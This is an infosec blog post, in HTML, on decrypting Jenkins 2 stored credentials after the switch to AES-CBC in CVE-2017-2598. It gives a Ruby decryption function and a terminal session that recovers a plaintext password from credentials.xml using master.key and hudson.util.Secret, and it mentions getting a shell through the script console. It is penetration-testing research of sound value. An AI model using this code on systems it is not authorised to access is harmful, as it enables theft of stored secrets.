<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<head>
  <link href="https://gmpg.org/xfn/11" rel="profile">
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta name="generator" content="Hugo 0.60.1" />

  
  <meta name="viewport" content="width=device-width, initial-scale=1.0">

  <title>Decrypting Jenkins 2 Credentials &middot; The Subtlety</title>
  <meta name="description" content="" />

  
  <link type="text/css" rel="stylesheet" href="https://www.thesubtlety.com/css/print.css" media="print">
  <link type="text/css" rel="stylesheet" href="https://www.thesubtlety.com/css/poole.css">
  <link type="text/css" rel="stylesheet" href="https://www.thesubtlety.com/css/syntax.css">
  <link type="text/css" rel="stylesheet" href="https://www.thesubtlety.com/css/hyde.css">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Abril+Fatface|PT+Sans:400,400i,700">


  
  <link rel="apple-touch-icon-precomposed" sizes="144x144" href="https://www.thesubtlety.com/apple-touch-icon-144-precomposed.png">
  <link rel="shortcut icon" href="https://www.thesubtlety.com/favicon.png">

  
  
</head>

  <body class=" ">
  <aside class="sidebar">
  <div class="container sidebar-sticky">
    <div class="sidebar-about">
      <a href="https://www.thesubtlety.com/"><h1>The Subtlety</h1></a>
      <p class="lead">
       Indiscriminate Idiotropics on Infosec 
      </p>
    </div>

    <nav>
      <ul class="sidebar-nav">
        <li><a href="https://www.thesubtlety.com/">Home</a> </li>
        <li><a href="https://www.thesubtlety.com/about/"> About </a></li><li><a href="https://github.com/thesubtlety/"> Github </a></li><li><a href="https://twitter.com/thesubtlety"> Twitter </a></li>
      </ul>
    </nav>

    <p>&copy; 2020. All rights reserved. </p>
  </div>
</aside>

    <main class="content container">
    <div class="post">
  <h1>Decrypting Jenkins 2 Credentials</h1>
  <time datetime=2017-06-21T23:07:11-0700 class="post-date">Wed, Jun 21, 2017</time>
  <p><img src="https://www.thesubtlety.com/img/jenkins.png#floatright" alt="jenkins">
I like Jenkins. It's a good orchestration tool and provides remote code execution as a service.</p>
<p>If your user permissions give you access to the script console <code>/script</code> it's trivial to obtain a shell. The developers explicitly call this out in their <a href="https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console">documentation</a> as well so it's a feature, not a bug.  Of course if you can create a job you can run shell commands as well, but I'll leave that for another time.</p>
<p>I've often seen privileged credentials stored here - from developer SSO credentials to service accounts to AWS keys and secrets. Given file system access or backup files with the key material, the encrypted secrets can easily be decrypted. This is pretty common knowledge and a really good write up on decrypting Jenkins credentials is at <a href="http://xn--thibaud-dya.fr/jenkins_credentials.html">thiébaud.fr</a> along with a simple python decrypt <a href="https://github.com/tweksteen/jenkins-decrypt/blob/master/decrypt.py">script</a>.</p>
<p>But there was a recent change to how Jenkins strings are encrypted and the existing decrypt scripts no longer work on Jenkins 2 as of about Jenkins version 2.44 which was released around February 1, 2017. This change was due to the following security advisory <a href="https://jenkins.io/security/advisory/2017-02-01/">SECURITY-304</a> and CVE-2017-2598.</p>
<blockquote>
<p><strong>Use of AES ECB block cipher mode without IV for encrypting secrets</strong></p>
</blockquote>
<blockquote>
<p>Secrets such as passwords are typically stored on disk and sent to users as part of some pages in encrypted form. These were encrypted using AES-128 ECB without IV, which exposes Jenkins and the stored secrets to unnecessary risks. Jenkins now encrypts secrets using AES-128 CBC with random IV.</p>
</blockquote>
<p>The relevant pull request with changes on Github is <a href="https://github.com/jenkinsci/jenkins/commit/e6aa166246d1734f4798a9e31f78842f4c85c28b">here</a>. We see that the <a href="https://github.com/jenkinsci/jenkins/blob/e6aa166246d1734f4798a9e31f78842f4c85c28b/core/src/main/java/hudson/util/HistoricalSecrets.java">old encryption function</a> has been pulled out into HistoricalSecrets.  Let's look at the <a href="https://github.com/jenkinsci/jenkins/blob/e6aa166246d1734f4798a9e31f78842f4c85c28b/core/src/main/java/hudson/util/Secret.java#L118">new encryption function</a>. It now uses CBC instead of ECB and utilizes an IV. The master secret encryption method didn't look to change, but the secrets encryption and decryption methods did.</p>
<p><img src="https://www.thesubtlety.com/img/jdiff.png" alt="diff"></p>
<p>I'm partial to Ruby and fortunately we can modify some previous work done by Github user <em>juyeong</em> who wrote a <a href="https://gist.github.com/juyeong/081379bd1ddb3754ed51ab8b8e535f7c">decrypt script</a> in Ruby for the original Jenkins encryption method. If we copy paste the new decrypt function's byte shifting code into that Ruby script we see that it can be used with just a bit of modification. After some slight massaging to get the ciphers working with Ruby, and extracting the IV and encrypted secret I landed on the below. We still use the original ECB decryption function to obtain the decryption key from the <code>master.key</code> and <code>hudson.util.Secret</code> files. We then leverage that key to decrypt the encrypted secrets.</p>
<pre><code class="ruby">
	def try_decrypt(encrypted,key)
	  encrypted_text = Base64.decode64(encrypted).bytes

	  iv_length = ((encrypted_text[1] & 0xff) << 24) | ((encrypted_text[2] & 0xff) << 16) | ((encrypted_text[3] & 0xff) << 8) | (encrypted_text[4] & 0xff)
	  
	  data_length = ((encrypted_text[5] & 0xff) << 24) | ((encrypted_text[6] & 0xff) << 16) | ((encrypted_text[7] & 0xff) << 8) | (encrypted_text[8] & 0xff)
	  
	  if encrypted_text.length != (1 + 8 + iv_length + data_length)
	      abort 'invalid encrypted string'
	  end
	  iv = encrypted_text[9..(9 + iv_length)].pack('C*')
	  code = encrypted_text[(9 + iv_length)..encrypted_text.length].pack('C*')

	  cipher = OpenSSL::Cipher.new('AES-128-CBC')
	  cipher.decrypt
	  cipher.key = key
	  cipher.iv = iv

	  text = cipher.update(code) + cipher.final
	  if text.length == 32 #Guessing API token
	    text = Digest::MD5.new.update(text).hexdigest
	  end
	  text
</code></pre>
<p>So given the <code>master.secret</code>, the <code>hudson.util.Secret</code>, and an encrypted string (within <code>credentials.xml</code> in this case), we can pass those files to the updated script and obtain the plaintext secrets.</p>
<pre><code class="nohighlight">
-&gt; % <b>cat credentials.xml</b>
&lt;?xml version='1.0' encoding='UTF-8'?&gt;
&lt;com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@2.1.14"&gt;
  &lt;domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"&gt;
    &lt;entry&gt;
      &lt;com.cloudbees.plugins.credentials.domains.Domain&gt;
        &lt;specifications/&gt;
      &lt;/com.cloudbees.plugins.credentials.domains.Domain&gt;
      &lt;java.util.concurrent.CopyOnWriteArrayList&gt;
        &lt;com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl&gt;
          &lt;scope&gt;GLOBAL&lt;/scope&gt;
          &lt;id&gt;2de25363-96dc-495b-b258-1ccb3366f5a6&lt;/id&gt;
          &lt;description&gt;&lt;/description&gt;
          <b>&lt;username&gt;testuser&lt;/username&gt;</b>
          <b>&lt;password&gt;{AQAAABAAAAAQd42B1h85u14cpl37q0qSekGHvTLrKx0+veCjouoYTGs=}&lt;/password&gt;</b>
        &lt;/com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl&gt;
      &lt;/java.util.concurrent.CopyOnWriteArrayList&gt;
    &lt;/entry&gt;
  &lt;/domainCredentialsMap&gt;
&lt;/com.cloudbees.plugins.credentials.SystemCredentialsProvider&gt;%              

-&gt; % <b>ruby decrypt_jenkins2.rb master.key hudson.util.Secret credentials.xml
testuser:Password123</b>
</code></pre>
<p>The full Jenkins 2 decrypt script is up on Github: <a href="https://gist.github.com/thesubtlety/e7d26891227f0b68b9d5db1ea9870c62">https://gist.github.com/thesubtlety/e7d26891227f0b68b9d5db1ea9870c62</a></p>

</div>


    </main>

    
<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
	ga('create', 'UA-29425132-1', 'auto');
	
	ga('send', 'pageview');
}
</script>
<script async src='https://www.google-analytics.com/analytics.js'></script>

  </body>
</html>
